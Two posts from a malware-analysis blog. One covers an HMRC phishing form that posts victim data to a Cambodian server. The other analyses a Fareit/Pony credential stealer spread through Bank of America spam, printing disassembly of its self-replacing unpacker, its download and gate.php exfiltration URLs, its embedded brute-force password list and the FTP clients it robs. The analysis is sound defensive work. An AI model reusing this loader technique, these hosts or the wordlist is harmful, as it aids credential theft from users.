• Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
  • Delicious

Anti-Malware Laboratory

Yet Another Malware Blog

About

An informal blog from your friendly neighborhood software security humans.

Blog Archive

  • ►  2015 (5)
    • ►  October (1)
    • ►  August (2)
    • ►  May (1)
    • ►  March (1)
  • ►  2014 (8)
    • ►  October (1)
    • ►  July (1)
    • ►  June (1)
    • ►  May (4)
    • ►  April (1)
  • ▼  2013 (12)
    • ►  December (3)
    • ►  November (5)
    • ▼  August (2)
      • Phishing targets HM Revenue & Customs clients
      • Bank of America spam: An Analysis
    • ►  March (2)
  • ►  2012 (35)
    • ►  April (4)
    • ►  March (12)
    • ►  February (17)
    • ►  January (2)

Categories

adobe (1) android (10) android february (1) baksmali (1) Black Hole (2) crimepack (1) disassembler (1) exploit (3) Exploits (4) Fakeav Winrar sfx (1) Fishbowl (1) flash (1) gift certificates (1) Google Authenticator (1) google play (1) hcp (1) java (1) Malware (5) mdac (1) Mobile (24) NSA Mobility Program (1) obfuscated script (1) pdf (1) Reversing (2) rhino (1) skype (1) smali (1) spam (1) test (1) Unpacking (1) vouchers (1) vulnerability (3)

Popular Posts

  • Bank of America spam: An Analysis
    An email claiming to be from Bank of America lures users to open an attachment that shows how to open secure emails from the bank. The mess...
  • [BE CAUTIOUS] Dragon Ball Z: Resurrection of F MALWARE and SCAM
    Be wary of downloading movies in torrent sites.  Executables can also be executed with a file size as huge as a gigabyte...
  • Unpacking MFC Compiled CryptoWall Malware
    Unpacking MFC Compiled CryptoWall Malware Introduction First and foremost, this article does not intend to analyze what CryptoWall malw...

Visitors to this blog

Wednesday, August 28, 2013

Phishing targets HM Revenue & Customs clients

Posted on Wednesday, August 28, 2013 by Red Horse | No comments
A new phishing targets HM Revenue & Customs clients. HM Revenue & Customs is an institution tied with the UK government responsible for UK's tax.

The phishing email contains these:



With a zip archive attachment that contains an HTML file named HM Revenue & Customs - Details.html.

Once the html file is opened, it shows this form:



The form looks legit since it uses images directly from the HMRC website.

When submitted, every information entered are sent to 
h00p://nagios.net1.com.kh/nagiosweb/Lang.php


At the time of this writing, directing to the site where the information is sent to was probably shot down and now returns a 404.

A simple whois query about the server shows: 

domain: nagios.net1.com.kh
current ip: 202.131.87.67
nameserver: ns1.cambotech.com
nameserver: ns2.cambotech.com
reverse lookup domains based on ip: 
  nagios.net1.com.kh
  crm.netone.com.kh

Located in Cambodia.

Nothing malware file was downloaded. Everything was plain and simple phishing and stealing.

Read More

Thursday, August 15, 2013

Bank of America spam: An Analysis

Posted on Thursday, August 15, 2013 by Red Horse | 1 comment
An email claiming to be from Bank of America lures users to open an attachment that shows how to open secure emails from the bank. The message states it is a security measure when transmitting confidential information.



The message contains an attachment: a zip archive file Instructions Secured E-mail.zip that contains an executable file Instructions Secured E-mail.exe that has its icon mimicked that of Adobe PDF files.



Notable details about the file shows no program name nor company name.



The Technical Part

The executable begins by decrypting a couple of data, into newly allocated memory spaces, containing codes that dynamically imports API that it will use later. This initially results to these APIs: 

CPU Dump
Address   Value      Comments
00240698   756A4BC6  ; kernel32.LoadLibraryA
0024069C   756A1225  ; kernel32.GetModuleHandleA
002406A0   756A1202    ; kernel32.GetProcAddress
002406A4   756A34EC  ; kernel32.VirtualProtect
002406A8   756A1801    ; kernel32.VirtualAlloc
002406AC   756A183E  ; kernel32.VirtualFree
002406B0   756A13D0  ; kernel32.CloseHandle
002406B4   756C9597  ; kernel32.CreateToolhelp32Snapshot
002406B8   756A14FA  ; kernel32.GetModuleFileNameA
002406BC   756ACA6E  ; kernel32.CreateFileA
002406C0   756A177B  ; kernel32.SetFilePointer
002406C4   756A1856  ; kernel32.ReadFile
002406C8   756A11D8  ; kernel32.GetCurrentProcessId
002406CC   75725F19   ; kernel32.Module32First
002406D0   75726002   ; kernel32.Module32Next
002406D4   756A14DD  ; kernel32.GetProcessHeap
002406D8   756A1126  ; kernel32.WaitForSingleObject
002406DC   779BDEC6  ; ntdll.RtlAllocateHeap


While at it, notable bugs can be seen when attempting to import more APIs. Simple string decryption was incomplete. 

seg000:0000005B                 pop     edi
seg000:0000005C                 add     edi, 0Dh
seg000:0000005F                 inc     byte ptr [edi]
seg000:00000061                 dec     byte ptr [edi+1]
seg000:00000064                 dec     byte ptr [edi+2]
seg000:00000067                 dec     byte ptr [edi+4]
seg000:0000006A                 push    edi             ; result: HeapAlloc
seg000:0000006B                 push    ebx
seg000:0000006C                 call    dword ptr [ebp+8] ; GetProcAddress
seg000:0000006F                 mov     [esi], eax
seg000:00000071                 add     edi, 0Ah
seg000:00000074                 dec     byte ptr [edi]    ; byte decrypt
seg000:00000076                 inc     byte ptr [edi+1]
seg000:00000079                 dec     byte ptr [edi+2]
seg000:0000007C                 inc     byte ptr [edi+3]
seg000:0000007F                 dec     byte ptr [edi+4]
seg000:00000082                 dec     byte ptr [edi+5]
seg000:00000085                 neg     byte ptr [edi+6] ; BUG here
seg000:00000088                 not     byte ptr [edi+7]
seg000:0000008B                 push    edi             ; result: "HeapFrfe"
seg000:0000008C                 push    ebx
seg000:0000008D                 call    dword ptr [ebp+8] ; GetProcAddress
seg000:00000090                 mov     [esi+4], eax
seg000:00000093                 add     edi, 9
seg000:00000096                 not     byte ptr [edi]  ; BUG here
seg000:00000098                 not     byte ptr [edi+1]
seg000:0000009B                 not     byte ptr [edi+2]
seg000:0000009E                 dec     byte ptr [edi+8]
seg000:000000A1                 push    edi             ; result: FetTickCmunt
seg000:000000A2                 push    ebx
seg000:000000A3                 call    dword ptr [ebp+8] ; GetProcAddress


Next, embedded into the file is an encrypted PE file with a size of 0x16e00 (93,696) bytes. Allocates memory space with the said size and decrypts there. 

seg000:0000065A                 push    4
seg000:0000065C                 push    1000h
seg000:00000661                 push    edi             ; size = 16e00 (93696 bytes)
seg000:00000662                 push    0
seg000:00000664                 call    dword ptr [ebp+10h] ; VirtualAlloc
seg000:00000667                 mov     esi, eax
seg000:00000669                 sub     esp, 104h
seg000:0000066F                 mov     edi, esp
seg000:00000671                 push    104h
seg000:00000676                 push    edi
seg000:00000677                 push    ebx
seg000:00000678                 call    dword ptr [ebp+20h] ; GetModuleFileName store to stack
seg000:0000067B                 push    0
seg000:0000067D                 push    80h
seg000:00000682                 push    3
seg000:00000684                 push    0
seg000:00000686                 push    1
seg000:00000688                 push    80000000h
seg000:0000068D                 push    edi
seg000:0000068E                 call    dword ptr [ebp+24h] ; CreateFileA - opens our file GENERIC_READ
seg000:00000691                 add     esp, 104h

seg000:000000EA                 mov     edi, eax
seg000:000000EC                 push    0
seg000:000000EE                 push    0
seg000:000000F0                 push    dword ptr [ebp+6Ch]
seg000:000000F3                 push    edi
seg000:000000F4                 call    dword ptr [ebp+28h] ; SetFilePointer - start of encrypted dump 0x46ec file offset
seg000:000000F7                 mov     ecx, [ebp+70h]
seg000:000000FA                 push    0
seg000:000000FC                 push    esp
seg000:000000FD                 pop     eax
seg000:000000FE                 push    dword ptr [esp]
seg000:00000101                 push    eax
seg000:00000102                 push    ecx
seg000:00000103                 push    esi
seg000:00000104                 push    edi
seg000:00000105                 call    dword ptr [ebp+2Ch] ; ReadFile size=16e00
seg000:00000108                 pop     eax
seg000:00000109                 push    edi
seg000:0000010A                 call    dword ptr [ebp+18h] ; CloseHandle
seg000:0000010D                 call    decryptAPEFile


Then replaces the whole running process with this new PE file by copying data section by section:
1. Use VirtualProtect API to replace memory protection with WRITE access.
2. Copy binary codes and data of the section based on the virtual size indicated in the PE section headers.
3. Restore the memory protection. 

seg000:00000139                 push    eax
seg000:0000013A                 push    esp
seg000:0000013B                 push    4
seg000:0000013D                 push    edi
seg000:0000013E                 push    ebx
seg000:0000013F                 call    dword ptr [ebp+0Ch] ; VirtualProtect replace protection with write
seg000:00000142                 push    esp
seg000:00000143                 push    2
seg000:00000145                 push    edi
seg000:00000146                 push    ebx
seg000:00000147                 push    esi
seg000:00000148                 mov     ecx, edi
seg000:0000014A                 mov     edi, ebx
seg000:0000014C                 rep movsb               ; replace first 512 bytes of running process with new PE
seg000:0000014E                 pop     esi
seg000:0000014F                 call    dword ptr [ebp+0Ch] ; VirtualProtect - replace rights with readonly
seg000:00000152                 pop     eax
seg000:00000153                 mov     ecx, esi
seg000:00000155                 add     ecx, [ecx+3Ch]
seg000:00000158                 lea     edi, [ecx+18h]
seg000:0000015B                 mov     edx, [edi+20h]
seg000:0000015E                 movzx   eax, word ptr [ecx+14h]
seg000:00000162                 add     edi, eax
seg000:00000164                 movzx   ecx, word ptr [ecx+6]
seg000:00000168 loc_168:
seg000:00000168                 pusha                   ; section
seg000:00000169                 mov     eax, [edi+14h]
seg000:0000016C                 test    eax, eax
seg000:0000016E                 jz      short loc_1B1
seg000:00000170                 mov     eax, [edi+8]
seg000:00000173                 test    eax, eax
seg000:00000175                 jz      short loc_1B1
seg000:00000177                 call    sizealign
seg000:0000017C                 mov     ecx, eax
seg000:0000017E                 mov     eax, [edi+24h]
seg000:00000181                 call    sub_42A
seg000:00000186                 add     esi, [edi+14h]
seg000:00000189                 push    dword ptr [edi+10h]
seg000:0000018C                 mov     edi, [edi+0Ch]
seg000:0000018F                 add     edi, ebx
seg000:00000191                 pop     ebx
seg000:00000192                 push    eax
seg000:00000193                 mov     edx, esp
seg000:00000195                 push    edx
seg000:00000196                 push    eax
seg000:00000197                 push    ecx
seg000:00000198                 push    edi
seg000:00000199                 push    ecx
seg000:0000019A                 push    edx
seg000:0000019B                 push    4
seg000:0000019D                 push    ecx
seg000:0000019E                 push    edi
seg000:0000019F                 call    dword ptr [ebp+0Ch] ; VirtualProtect for write
seg000:000001A2                 pop     ecx
seg000:000001A3                 xor     eax, eax
seg000:000001A5                 push    edi
seg000:000001A6                 rep stosb
seg000:000001A8                 pop     edi
seg000:000001A9                 mov     ecx, ebx
seg000:000001AB                 rep movsb               ; copy data
seg000:000001AD                 call    dword ptr [ebp+0Ch] ; VirtualProtect for read only
seg000:000001B0                 pop     eax
seg000:000001B1 loc_1B1:
seg000:000001B1                 popa
seg000:000001B2                 add     edi, 28h ; '('
seg000:000001B5                 loop    loc_168         ; rerun to all sections


Then dynamically imports the APIs indicated in the new PE's import section table and results to these APIs: 

CPU Dump
Address   Value      Comments
0041828C   756ACA6E  ; kernel32.CreateFileA
00418290   756A1856  ; kernel32.ReadFile
00418294   756A13D0  ; kernel32.CloseHandle
00418298   756A1262  ; kernel32.WriteFile
0041829C   756B9A09  ; kernel32.lstrlenA
004182A0   756BA337  ; kernel32.GlobalLock
004182A4   756BA272  ; kernel32.GlobalUnlock
004182A8   756A4114  ; kernel32.LocalFree
004182AC   756A1A39  ; kernel32.LocalAlloc
004182B0   756A10FC  ; kernel32.GetTickCount
004182B4   756C28B1  ; kernel32.lstrcpy
004182B8   756C2951  ; kernel32.lstrcat
004182BC   756ACABC  ; kernel32.GetFileAttributesA
004182C0   756BDC78  ; kernel32.ExpandEnvironmentStringsA
004182C4   756A1AE2  ; kernel32.GetFileSize
004182C8   756ABDC0  ; kernel32.CreateFileMappingA
004182CC   756A1A75  ; kernel32.MapViewOfFile
004182D0   756A156F  ; kernel32.UnmapViewOfFile
004182D4   756A4BC6  ; kernel32.LoadLibraryA
004182D8   756A1202  ; kernel32.GetProcAddress
004182DC   756C2B74  ; kernel32.GetTempPathA
004182E0   756C2909  ; kernel32.CreateDirectoryA
004182E4   756ACAEC  ; kernel32.DeleteFileA
004182E8   756A1568  ; kernel32.GetCurrentProcess
004182EC   756A16B3  ; kernel32.WideCharToMultiByte
004182F0   756A11B0  ; kernel32.GetLastError
004182F4   756BDC90  ; kernel32.lstrcmp
004182F8   756C9597  ; kernel32.CreateToolhelp32Snapshot
004182FC   756C778B  ; kernel32.Process32First
00418300   756A1B12  ; kernel32.OpenProcess
00418304   756C7549  ; kernel32.Process32Next
00418308   756ADDDC  ; kernel32.FindFirstFileA
0041830C   756B99B3  ; kernel32.lstrcmpi
00418310   756C2921  ; kernel32.FindNextFileA
00418314   756A32CD  ; kernel32.FindClose
00418318   756A1225  ; kernel32.GetModuleHandleA
0041831C   756A1EDC  ; kernel32.GetVersionExA
00418320   756BD889  ; kernel32.GetLocaleInfoA
00418324   756A4D3F  ; kernel32.GetSystemInfo
00418328   756C29CF  ; kernel32.GetWindowsDirectoryA
0041832C   756AE6A7  ; kernel32.GetPrivateProfileStringA
00418330   756B9562  ; kernel32.SetCurrentDirectoryA
00418334   7571A3B1  ; kernel32.GetPrivateProfileSectionNamesA
00418338   756CBF8B  ; kernel32.GetPrivateProfileIntA
0041833C   756CC45E  ; kernel32.GetCurrentDirectoryA
00418340   756A16A6  ; kernel32.lstrlenW
00418344   756A1AA5  ; kernel32.MultiByteToWideChar
00418348   756A10EF  ; kernel32.Sleep
0041834C   756A14FA  ; kernel32.GetModuleFileNameA
00418350   756CB4FB  ; kernel32.LCMapStringA
00418354   756A734E  ; kernel32.ExitProcess
00418358   756AD03C  ; kernel32.SetUnhandledExceptionFilter
00418360   762A2404  ; ole32.CreateStreamOnHGlobal
00418364   762A3ECA  ; ole32.GetHGlobalFromStream
00418368   762C10DD  ; ole32.CoCreateGuid
0041836C   762D4003  ; ole32.CoTaskMemFree
00418370   762D57FC  ; ole32.CoCreateInstance
00418374   7629EF0B  ; ole32.OleInitialize
0041837C   75FAAF26  ; USER32.wsprintfA
00418384   7746BC0D  ; ADVAPI32.RegOpenKeyExA
00418388   7746BC25  ; ADVAPI32.RegQueryValueExA
0041838C   7746BED4  ; ADVAPI32.RegCloseKey
00418390   7745D2ED  ; ADVAPI32.RegOpenKeyA
00418394   77461B89  ; ADVAPI32.RegEnumKeyExA
00418398   7745D3C1  ; ADVAPI32.RegCreateKeyA
0041839C   77461B96  ; ADVAPI32.RegSetValueExA
004183A0   7746BEE4  ; ADVAPI32.IsTextUnicode
004183A4   77462EBA  ; ADVAPI32.RegOpenCurrentUser
004183A8   7745D539  ; ADVAPI32.RegEnumValueA
004183AC   7745E504  ; ADVAPI32.GetUserNameA
004183B4   766A9BA5  ; shell32.ShellExecuteA
004183BC   76090EA5  ; wininet.InternetCrackUrlA
004183C0   7609B636  ; wininet.InternetCreateUrlA
004183C8   75E5DAFE  ; SHLWAPI.StrStrIA
004183CC   75E8C64B  ; SHLWAPI.StrRChrIA
004183D0   75E5BF27  ; SHLWAPI.StrToIntA
004183D4   75E5CDB6  ; SHLWAPI.StrStrA
004183D8   75E5DB5A  ; SHLWAPI.StrCmpNIA
004183DC   75E649E1  ; SHLWAPI.StrStrIW
004183E4   770DE846  ; urlmon.ObtainUserAgentString
004183EC   75563234  ; WS2_32.inet_addr
004183F0   75577133  ; WS2_32.gethostbyname
004183F4   75563F00  ; WS2_32.socket
004183F8   755648BE  ; WS2_32.connect
004183FC   75563BED  ; WS2_32.closesocket
00418400   7556C4C8  ; WS2_32.send
00418404   75564981  ; WS2_32.select
00418408   719F17A8  ; wsock32.recv
0041840C   719F18E0  ; wsock32.setsockopt
00418410   7556C0FB  ; WS2_32.WSAStartup
00418418   7389D1F9  ; userenv.LoadUserProfileA
0041841C   73893F0D  ; userenv.UnloadUserProfile


Since the running process has been replaced by a new PE files, some information in its Process Environment Block should be changed such as the entry point and the image base. 

seg000:000001D4                 push    dword ptr fs:30h
seg000:000001DB                 pop     eax
seg000:000001DC                 mov     eax, [eax+0Ch]
seg000:000001DF                 mov     eax, [eax+0Ch]
seg000:000001E2 loc_1E2:
seg000:000001E2                 cmp     [eax+18h], ebx
seg000:000001E5                 jz      short loc_1EB
seg000:000001E7                 mov     eax, [eax]
seg000:000001E9                 jmp     short loc_1E2
seg000:000001EB loc_1EB:
seg000:000001EB                 mov     ecx, [esp]
seg000:000001EE                 add     ecx, [ecx+3Ch]
seg000:000001F1                 mov     esi, [ecx+28h]
seg000:000001F4                 add     esi, edi
seg000:000001F6                 mov     [eax+18h], edi
seg000:000001F9                 mov     [eax+1Ch], esi
seg000:000001FC                 test    word ptr [ecx+16h], 2000h
seg000:00000202                 jnz     short loc_210
seg000:00000204                 mov     eax, dword ptr fs:18h
seg000:0000020A                 mov     eax, [eax+30h]
seg000:0000020D                 mov     [eax+8], edi    ; update entry point in PEB


And then returns back to the modified process starting at the entry point. 

seg000:0000021A                 mov     [esp+1Ch], esi  ; sets up at 0x1c where [esp] gets to be entry point
seg000:0000021E                 popa
seg000:0000021F                 push    eax
seg000:00000220                 call    callnextline2
seg000:00000225                 pop     eax
seg000:00000226                 cmp     dword ptr [eax+64h], 200h
seg000:0000022D                 jnz     short loc_23E
seg000:0000022F                 mov     eax, [esp]
seg000:00000232                 mov     dword ptr [esp], 0
seg000:00000239                 push    dword ptr [esp+4]
seg000:0000023D                 push    eax             ; transfer control to new PE entry point
seg000:0000023E loc_23E:
seg000:0000023E                 xor     eax, eax
seg000:00000240                 retn


Still Fareit
A simple binary comparison shows that this is a Fareit variant almost similar to that of http://thecyberdung.blogspot.com/2013/02/developing-fareit-still-steals-your.html. Here are some of the highlighted differences:
* Malware download sites (can be updates of its variant): 

.data:004140CD aHttpMissionsea db 'h00p://Missionsearchjobs.com/D5F7G.exe',0
.data:004140F4 aHttpBetterback db 'h00p://betterbacksystems.com/kvq.exe',0
.data:00414119 aHttpWww_printd db 'h00p://www.printdirectadvertising.com/vfMJH.exe',0
.data:00414149 aHttpS381195155 db 'h00p://S381195155.onlinehome.us/vmkCQg8N.exe',0
At the time of this writing, h00p://Missionsearchjobs.com/D5F7G.exe and h00p://S381195155.onlinehome.us/vmkCQg8N.exe were the only ones up and are both the same file with this MD5 060260f668ce9f0b6d8c75c2893f3796.

* Servers it sends stolen information to and receives updates from 

.data:0041400C aHttpGuterprote db 'h00p://guterprotectionperfection.com/ponyb/gate.php',0
.data:00414040 aHttpGuterprova db 'h00p://guterprova.com/ponyb/gate.php',0
.data:00414065 aHttpGutterglov db 'h00p://gutterglovegutterprotection.com/ponyb/gate.php',0
.data:0041409B aHttpGutterguar db 'h00p://gutterguardbuyersguide.com/ponyb/gate.php',0


* The passwords list it used to brute 

.data:00416D79 aDiamond        db 'diamond',0
.data:00416D81 aHope           db 'hope',0
.data:00416D86 aMaggie         db 'maggie',0
.data:00416D8D aMaverick       db 'maverick',0
.data:00416D96 aOnline         db 'online',0
.data:00416D9D aSpirit         db 'spirit',0
.data:00416DA4 aGeorge         db 'george',0
.data:00416DAB aFriends        db 'friends',0
.data:00416DB3 aDallas         db 'dallas',0
.data:00416DBA aAdidas         db 'adidas',0
.data:00416DC1 a1q2w3e         db '1q2w3e',0
.data:00416DC8 a7777           db '7777',0
.data:00416DCD aOrange         db 'orange',0
.data:00416DD4 aTesttest       db 'testtest',0
.data:00416DDD aAsshole        db 'asshole',0
.data:00416DE5 aApple          db 'apple',0
.data:00416DEB aBiteme         db 'biteme',0
.data:00416DF2 a666666         db '666666',0
.data:00416DF9 aWilliam        db 'william',0
.data:00416E01 aMickey         db 'mickey',0
.data:00416E08 aAsdfgh         db 'asdfgh',0
.data:00416E0F aWisdom         db 'wisdom',0
.data:00416E16 aBatman         db 'batman',0
.data:00416E1D aMichelle       db 'michelle',0
.data:00416E26 aDavid          db 'david',0
.data:00416E2C aEminem         db 'eminem',0
.data:00416E33 aScooter        db 'scooter',0
.data:00416E3B aAsdfasdf       db 'asdfasdf',0
.data:00416E44 aSammy          db 'sammy',0
.data:00416E4A aBaby           db 'baby',0
.data:00416E4F aSamantha       db 'samantha',0
.data:00416E58 aMaxwell        db 'maxwell',0
.data:00416E60 a55555          db '55555',0
.data:00416E66 aJustin         db 'justin',0
.data:00416E6D aJames          db 'james',0
.data:00416E73 aChicken        db 'chicken',0
.data:00416E7B aDanielle       db 'danielle',0
.data:00416E84 aIloveyou2      db 'iloveyou2',0
.data:00416E8E aFuckoff        db 'fuckoff',0
.data:00416E96 aPrince         db 'prince',0
.data:00416E9D aJunior         db 'junior',0
.data:00416EA4 aRainbow        db 'rainbow',0
.data:00416EAC a112233         db '112233',0
.data:00416EB3 aFuckyou1       db 'fuckyou1',0
.data:00416EBC a1              db '1',0
.data:00416EBE aNintendo       db 'nintendo',0
.data:00416EC7 aPeanut         db 'peanut',0
.data:00416ECE aNone           db 'none',0
.data:00416ED3 aChurch         db 'church',0
.data:00416EDA aBubbles        db 'bubbles',0
.data:00416EE2 aRobert         db 'robert',0
.data:00416EE9 a222222         db '222222',0
.data:00416EF0 aDestiny        db 'destiny',0
.data:00416EF8 aLoving         db 'loving',0
.data:00416EFF aGfhjkm         db 'gfhjkm',0
.data:00416F06 aMylove         db 'mylove',0
.data:00416F0D aJasper         db 'jasper',0
.data:00416F14 aHallo          db 'hallo',0
.data:00416F1A a123321         db '123321',0
.data:00416F21 aCocacola       db 'cocacola',0
.data:00416F2A aHelpme         db 'helpme',0
.data:00416F31 aNicole         db 'nicole',0
.data:00416F38 aGuitar         db 'guitar',0
.data:00416F3F aBillgates      db 'billgates',0
.data:00416F49 aLooking        db 'looking',0
.data:00416F51 aScooby         db 'scooby',0
.data:00416F58 aJoseph         db 'joseph',0
.data:00416F5F aGenesis        db 'genesis',0
.data:00416F67 aForum          db 'forum',0
.data:00416F6D aEmmanuel       db 'emmanuel',0
.data:00416F76 aCassie         db 'cassie',0
.data:00416F7D aVictory        db 'victory',0
.data:00416F85 aPassw0rd       db 'passw0rd',0
.data:00416F8E aFoobar         db 'foobar',0
.data:00416F95 aIlovegod       db 'ilovegod',0
.data:00416F9E aNathan         db 'nathan',0
.data:00416FA5 aBlabla         db 'blabla',0
.data:00416FAC aDigital        db 'digital',0
.data:00416FB4 aPeaches        db 'peaches',0
.data:00416FBC aFootball1      db 'football1',0
.data:00416FC6 a11111111       db '11111111',0
.data:00416FCF aPower          db 'power',0
.data:00416FD5 aThunder        db 'thunder',0
.data:00416FDD aGateway        db 'gateway',0
.data:00416FE5 aIloveyou       db 'iloveyou!',0
.data:00416FEF aFootball       db 'football',0
.data:00416FF8 aTigger         db 'tigger',0
.data:00416FFF aCorvette       db 'corvette',0
.data:00417008 aAngel          db 'angel',0
.data:0041700E aKiller         db 'killer',0
.data:00417015 aCreative       db 'creative',0
.data:0041701E a123456789      db '123456789',0
.data:00417028 aGoogle         db 'google',0
.data:0041702F aZxcvbnm        db 'zxcvbnm',0
.data:00417037 aStartrek       db 'startrek',0
.data:00417040 aAshley         db 'ashley',0
.data:00417047 aCheese         db 'cheese',0
.data:0041704E aA              db 'a',0
.data:00417050 aSunshine       db 'sunshine',0
.data:00417059 aChrist         db 'christ',0
.data:00417060 a000000         db '000000',0
.data:00417067 aSoccer         db 'soccer',0
.data:0041706E aQwerty1        db 'qwerty1',0
.data:00417076 aFriend         db 'friend',0
.data:0041707D aSummer         db 'summer',0
.data:00417084 a1234567        db '1234567',0
.data:0041708C aMerlin         db 'merlin',0
.data:00417093 aPhpbb          db 'phpbb',0
.data:00417099 a12345678       db '12345678',0
.data:004170A2 aJordan         db 'jordan',0
.data:004170A9 aSaved          db 'saved',0
.data:004170AF aDexter         db 'dexter',0
.data:004170B6 aViper          db 'viper',0
.data:004170BC aWinner         db 'winner',0
.data:004170C3 aSparky         db 'sparky',0
.data:004170CA aWindows        db 'windows',0
.data:004170D2 a123abc         db '123abc',0
.data:004170D9 aLucky          db 'lucky',0
.data:004170DF aAnthony        db 'anthony',0
.data:004170E7 aJesus          db 'jesus',0
.data:004170ED aGhbdtn         db 'ghbdtn',0
.data:004170F4 aAdmin          db 'admin',0
.data:004170FA aHotdog         db 'hotdog',0
.data:00417101 aBaseball       db 'baseball',0
.data:0041710A aPassword1      db 'password1',0
.data:00417114 aDragon         db 'dragon',0
.data:0041711B aTrustno1       db 'trustno1',0
.data:00417124 aJason          db 'jason',0
.data:0041712A aInternet       db 'internet',0
.data:00417133 aMustdie        db 'mustdie',0
.data:0041713B aJohn           db 'john',0
.data:00417140 aLetmein        db 'letmein',0
.data:00417148 a123            db '123',0
.data:0041714C aMike           db 'mike',0
.data:00417151 aKnight         db 'knight',0
.data:00417158 aJordan23       db 'jordan23',0
.data:00417161 aAbc123         db 'abc123',0
.data:00417168 aRed123         db 'red123',0
.data:0041716F aPraise         db 'praise',0
.data:00417176 aFreedom        db 'freedom',0
.data:0041717E aJesus1         db 'jesus1',0
.data:00417185 a12345          db '12345',0
.data:0041718B aLondon         db 'london',0
.data:00417192 aComputer       db 'computer',0
.data:0041719B aMicrosoft      db 'microsoft',0
.data:004171A5 aMuffin         db 'muffin',0
.data:004171AC aQwert          db 'qwert',0
.data:004171B2 aMother         db 'mother',0
.data:004171B9 aMaster         db 'master',0
.data:004171C0 a111111         db '111111',0
.data:004171C7 aQazwsx         db 'qazwsx',0
.data:004171CE aSamuel         db 'samuel',0
.data:004171D5 aCanada         db 'canada',0
.data:004171DC aSlayer         db 'slayer',0
.data:004171E3 aRachel         db 'rachel',0
.data:004171EA aOnelove        db 'onelove',0
.data:004171F2 aQwerty         db 'qwerty',0
.data:004171F9 aPrayer         db 'prayer',0
.data:00417200 aIloveyou1      db 'iloveyou1',0
.data:0041720A aWhatever       db 'whatever',0
.data:00417213 aGod            db 'god',0
.data:00417217 aPassword_1     db 'password',0
.data:00417220 aBlessing       db 'blessing',0
.data:00417229 aSnoopy         db 'snoopy',0
.data:00417230 a1q2w3e4r       db '1q2w3e4r',0
.data:00417239 aCookie         db 'cookie',0
.data:00417240 a11111          db '11111',0
.data:00417246 aChelsea        db 'chelsea',0
.data:0041724E aPokemon        db 'pokemon',0
.data:00417256 aHahaha         db 'hahaha',0
.data:0041725D aAaaaaa         db 'aaaaaa',0
.data:00417264 aHardcore       db 'hardcore',0
.data:0041726D aShadow         db 'shadow',0
.data:00417274 aWelcome        db 'welcome',0
.data:0041727C aMustang        db 'mustang',0
.data:00417284 a654321         db '654321',0
.data:0041728B aBailey         db 'bailey',0
.data:00417292 aBlahblah       db 'blahblah',0
.data:0041729B aMatrix         db 'matrix',0
.data:004172A2 aJessica        db 'jessica',0
.data:004172AA aStella         db 'stella',0
.data:004172B1 aBenjamin       db 'benjamin',0
.data:004172BA aTesting        db 'testing',0
.data:004172C2 aSecret         db 'secret',0
.data:004172C9 aTrinity        db 'trinity',0
.data:004172D1 aRichard        db 'richard',0
.data:004172D9 aPeace          db 'peace',0
.data:004172DF aShalom         db 'shalom',0
.data:004172E6 aMonkey         db 'monkey',0
.data:004172ED aIloveyou_0     db 'iloveyou',0
.data:004172F6 aThomas         db 'thomas',0
.data:004172FD aBlink182       db 'blink182',0
.data:00417306 aJasmine        db 'jasmine',0
.data:0041730E aPurple         db 'purple',0
.data:00417315 aTest           db 'test',0
.data:0041731A aAngels         db 'angels',0
.data:00417321 aGrace          db 'grace',0
.data:00417327 aHello          db 'hello',0
.data:0041732D aPoop           db 'poop',0
.data:00417332 aBlessed        db 'blessed',0
.data:0041733A a1234567890     db '1234567890',0
.data:00417345 aHeaven         db 'heaven',0
.data:0041734C aHunter         db 'hunter',0
.data:00417353 aPepper         db 'pepper',0
.data:0041735A aJohn316        db 'john316',0
.data:00417362 aCool           db 'cool',0
.data:00417367 aBuster         db 'buster',0
.data:0041736E aAndrew         db 'andrew',0
.data:00417375 aFaith          db 'faith',0
.data:0041737B aGinger         db 'ginger',0
.data:00417382 a7777777        db '7777777',0
.data:0041738A aHockey         db 'hockey',0
.data:00417391 aHello1         db 'hello1',0
.data:00417398 aAngel1         db 'angel1',0
.data:0041739F aSuperman       db 'superman',0
.data:004173A8 aEnter          db 'enter',0
.data:004173AE aDaniel         db 'daniel',0
.data:004173B5 a123123         db '123123',0
.data:004173BC aForever        db 'forever',0
.data:004173C4 aNothing        db 'nothing',0
.data:004173CC aDakota         db 'dakota',0
.data:004173D3 aKitten         db 'kitten',0
.data:004173DA aAsdf           db 'asdf',0
.data:004173DF a1111           db '1111',0
.data:004173E4 aBanana         db 'banana',0
.data:004173EB aGates          db 'gates',0
.data:004173F1 aFlower         db 'flower',0
.data:004173F8 aTaylor         db 'taylor',0
.data:004173FF aLovely         db 'lovely',0
.data:00417406 aHannah         db 'hannah',0
.data:0041740D aPrincess       db 'princess',0
.data:00417416 aCompaq         db 'compaq',0
.data:0041741D aJennifer       db 'jennifer',0
.data:00417426 aMyspace1       db 'myspace1',0
.data:0041742F aSmokey         db 'smokey',0
.data:00417436 aMatthew        db 'matthew',0
.data:0041743E aHarley         db 'harley',0
.data:00417445 aRotimi         db 'rotimi',0
.data:0041744C aFuckyou        db 'fuckyou',0
.data:00417454 aSoccer1        db 'soccer1',0
.data:0041745C a123456         db '123456',0
.data:00417463 aSingle         db 'single',0
.data:0041746A aJoshua         db 'joshua',0
.data:00417471 aGreen          db 'green',0
.data:00417477 a123qwe         db '123qwe',0
.data:0041747E aStarwars       db 'starwars',0
.data:00417487 aLove           db 'love',0
.data:0041748C aSilver         db 'silver',0
.data:00417493 aAustin         db 'austin',0
.data:0041749A aMichael        db 'michael',0
.data:004174A2 aAmanda         db 'amanda',0
.data:004174A9 a1234           db '1234',0
.data:004174AE aCharlie        db 'charlie',0
.data:004174B6 aBandit         db 'bandit',0
.data:004174BD aChris          db 'chris',0
.data:004174C3 aHappy          db 'happy',0
.data:004174C9 aPass_0         db 'pass',0


* What does it steal?

Similar to the previous variants, it steals stored credentials from different applications, and most of it FTP clients. After further web search, found out this NoPaste item, dated April 21, 2013, titled ; Password recovery modules at http://nopaste.me/paste/164967415851741239b4ee8. Seems to be the source code module, in assembly language, that gathers stored credentials. The user who pasted this is not specified. The module's source is quite descriptive with these target applications:
  • Common System Information
  • FAR/FAR2/FAR3 built-in ftp client
  • Windows/Total Commander built-in ftp client
  • Ipswitch WS_FTP client
  • CuteFTP
  • FlashFXP
  • FileZilla
  • FTP Commander
  • BulletProof FTP
  • SmartFTP 2.x-4.x
  • TurboFTP
  • FFFTP
  • CoffeeCupFTP
